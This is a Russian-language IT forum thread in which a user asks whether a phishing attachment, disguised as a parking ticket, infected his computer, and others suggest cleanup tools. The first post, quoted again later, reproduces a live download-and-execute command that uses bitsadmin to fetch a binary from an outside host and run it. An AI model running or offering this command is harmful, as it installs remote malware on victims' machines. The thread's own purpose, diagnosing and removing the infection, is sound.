троян вирус?

User avatar
kyk
Уже с Приветом
Posts: 31438
Joined: 21 Nov 2004 05:12
Location: камбуз на кампусе

троян вирус?

Post by kyk »

В мыле, замаскированный как якобы parking ticket, пришёл attachment c таким вот линком внутри.
Вроде бы я кликнул.

C:\Windows\System32\cmd.exe /c bitsadmin.exe /transfer j /priority high http://ryp.preethimohan.in/duto/hero.bin %AppData%\34.exe & %AppData%\34.exe
Лучше переесть, чем недоспать! © Обратное тоже верно :umnik1:
User avatar
Uzito
Уже с Приветом
Posts: 8230
Joined: 06 Feb 2002 10:01
Location: NJ, USA

Re: троян вирус?

Post by Uzito »

Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.
User avatar
kyk
Уже с Приветом
Posts: 31438
Joined: 21 Nov 2004 05:12
Location: камбуз на кампусе

Re: троян вирус?

Post by kyk »

Uzito wrote: 18 Jul 2017 17:30 Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.
как лечить?
Лучше переесть, чем недоспать! © Обратное тоже верно :umnik1:
User avatar
thinker
Уже с Приветом
Posts: 26853
Joined: 29 Aug 2000 09:01

Re: троян вирус?

Post by thinker »

Try: Malwarebytes
All rights reserved, all wrongs revenged.
User avatar
Uzito
Уже с Приветом
Posts: 8230
Joined: 06 Feb 2002 10:01
Location: NJ, USA

Re: троян вирус?

Post by Uzito »

kyk wrote: 18 Jul 2017 17:35
Uzito wrote: 18 Jul 2017 17:30 Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.
как лечить?
А это зависит от того, что экзешник сделал.
В самом простом случае, сделать system restore или если просто добавилось в авторан и запускается каждый раз, перегрузиться в safe mode, вычистить экзешник из %AppData%. А если оно слишком зловредное и убило все откаты, то только формат си - хер знает что оно там могло сделать, особенно если Вы под админом гуляете.
User avatar
Slonjra
Уже с Приветом
Posts: 6662
Joined: 02 Sep 2003 15:19
Location: Через речку от Манхэттена

Re: троян вирус?

Post by Slonjra »

kyk wrote: 18 Jul 2017 17:35
Uzito wrote: 18 Jul 2017 17:30 Ну ясень пень. Скачало в бэкграунде экзешник, прицепило в авторан.
как лечить?
из бесплатных - вот эта пара

https://www.bleepingcomputer.com/download/combofix/

https://www.malwarebytes.com/ (бесплатную версию)

прогонять лучше в Safe mode.
Резюме — это список дел, которые ты больше никогда не хочешь делать.
User avatar
AndreyT
Уже с Приветом
Posts: 3009
Joined: 14 Apr 2004 01:11
Location: SFBA (было: Минск, Беларусь)

Re: троян вирус?

Post by AndreyT »

kyk wrote: 18 Jul 2017 17:25 В мыле, замаскированный как якобы parking ticket, пришёл attachment c таким вот линком внутри.
Вроде бы я кликнул.

C:\Windows\System32\cmd.exe /c bitsadmin.exe /transfer j /priority high http://ryp.preethimohan.in/duto/hero.bin %AppData%\34.exe & %AppData%\34.exe
Кликнул на что именно? Т.е. вы видели собственными глазами, что запускался cmd.exe?
Best regards,
Андрей
User avatar
kyk
Уже с Приветом
Posts: 31438
Joined: 21 Nov 2004 05:12
Location: камбуз на кампусе

Re: троян вирус?

Post by kyk »

Uzito wrote: 18 Jul 2017 17:38 вычистить экзешник из %AppData%.
Иду в фолдер %AppData% и никаких экзешников не вижу

Hidden/system file view - enabled (Win-7-64)
Лучше переесть, чем недоспать! © Обратное тоже верно :umnik1:
User avatar
Uzito
Уже с Приветом
Posts: 8230
Joined: 06 Feb 2002 10:01
Location: NJ, USA

Re: троян вирус?

Post by Uzito »

kyk wrote: 18 Jul 2017 18:27
Uzito wrote: 18 Jul 2017 17:38 вычистить экзешник из %AppData%.
Иду в фолдер %AppData% и никаких экзешников не вижу
Hidden/system file view - enabled (Win-7-64)
Ну тут вариантов три
1) У вас установился руткит, который прячет свое эезешник от посторонних глаз.
2) Оно после запуска заховалось куда-то глубже.
3) Оно не смогло скачаться/запуститься и проблемы нет.

Сказать что случилось на самом деле я не берусь. На всякий случай все же сделайте system restore на предыдущую сохраненку и прогоните порекомендованые combofix и malwarebytes.
User avatar
kyk
Уже с Приветом
Posts: 31438
Joined: 21 Nov 2004 05:12
Location: камбуз на кампусе

Re: троян вирус?

Post by kyk »

прогнал Malwarebytes, MSE антивирус и MS "Windows Malicious Software Removal Tool (MSRT) July 2017" aka KB890830.

Ничего не нашлось
Лучше переесть, чем недоспать! © Обратное тоже верно :umnik1:
User avatar
Uzito
Уже с Приветом
Posts: 8230
Joined: 06 Feb 2002 10:01
Location: NJ, USA

Re: троян вирус?

Post by Uzito »

kyk wrote: 18 Jul 2017 22:50 прогнал Malwarebytes, MSE антивирус и MS "Windows Malicious Software Removal Tool (MSRT) July 2017" aka KB890830.
Ничего не нашлось
Если линк в первом сообщении верный, то всё пучком - ничего оттуда скорее всего не скачалось.

Code: Select all

H:\junk\wget>wget.exe http://ryp.preethimohan.in/duto/hero.bin
--2017-07-18 18:26:41--  http://ryp.preethimohan.in/duto/hero.bin
Resolving ryp.preethimohan.in... 31.28.1.141
Connecting to ryp.preethimohan.in|31.28.1.141|:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
2017-07-18 18:26:41 ERROR 403: Forbidden.
blanko27
Уже с Приветом
Posts: 2261
Joined: 17 Jun 2003 04:41
Location: Just like US

Re: троян вирус?

Post by blanko27 »

Uzito wrote: 18 Jul 2017 23:26Если линк в первом сообщении верный, то всё пучком - ничего оттуда скорее всего не скачалось.
Ну вот, человек писал, старался, а его троян забанили... :(

Image
...а мы такой компанией, возьмем, да и припремся к Элис!
User avatar
AndreyT
Уже с Приветом
Posts: 3009
Joined: 14 Apr 2004 01:11
Location: SFBA (было: Минск, Беларусь)

Re: троян вирус?

Post by AndreyT »

blanko27 wrote: 19 Jul 2017 00:17
Uzito wrote: 18 Jul 2017 23:26Если линк в первом сообщении верный, то всё пучком - ничего оттуда скорее всего не скачалось.
Ну вот, человек писал, старался, а его троян забанили... :(
Ничего вы не поняли. Человек хотел заDDoSить уютный сайтик ненавистного конкурента. Хитро запостил сюда ссылку. Все сразу ломанулись скачивать, думая что это бесплатная раздача вирусов. В результате сайтик успешно заDDoSился...
Best regards,
Андрей
blanko27
Уже с Приветом
Posts: 2261
Joined: 17 Jun 2003 04:41
Location: Just like US

Re: троян вирус?

Post by blanko27 »

AndreyT wrote: 20 Jul 2017 01:26В результате сайтик успешно заDDoSился...
Ах да, это хитроумная идея :D
...а мы такой компанией, возьмем, да и припремся к Элис!

Return to “Вопросы и новости IT”